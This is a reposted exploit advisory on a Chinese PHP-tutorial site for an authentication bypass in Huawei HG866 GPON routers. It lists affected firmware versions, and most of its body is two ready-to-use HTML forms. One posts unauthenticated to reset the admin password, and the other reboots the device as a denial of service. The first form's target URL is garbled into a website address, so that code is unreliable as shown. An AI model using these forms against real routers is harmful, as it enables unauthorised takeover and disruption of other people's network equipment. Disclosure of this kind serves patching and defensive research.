来源:自学PHP网 时间:2015-04-17 13:02 作者: 阅读:次
[导读] 标题: Huawei HG866 Authentication Bypass作者: hkm程序开发者: http://www.huawei.com影响版本: V1R2C01SPC202, R3.2.4.92sbn - R3.4.2.257sbn, 3FE53864AOCB16测试平台: HG866GTA_VER.C, 01, 0......
|
标题: Huawei HG866 Authentication Bypass
作者: hkm 程序开发者: http://www.huawei.com 影响版本: V1R2C01SPC202, R3.2.4.92sbn - R3.4.2.257sbn, 3FE53864AOCB16 测试平台: HG866GTA_VER.C, 01, 02 概要 Huawei HG866 GPON routers don't properly validate the session on every page. It is possible to change the web interface admin password by performing an unauthenticated post directly to the form. 测试证明 <!--Changes root password --!> <form name=hg866bypass action=http:// www.2cto.com /html/password.html method=post > <input name=psw value=password ><input name=reenterpsw value=password > <input type="submit" name="save" value="Apply" /> </form> <!--Reboots the device --!> <form name=hg866dos action=http://192.168.100.251/html/admin_reboot.html" method="post"> <input type=submit name=save id=save value=Reboot /> </form> hkm |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
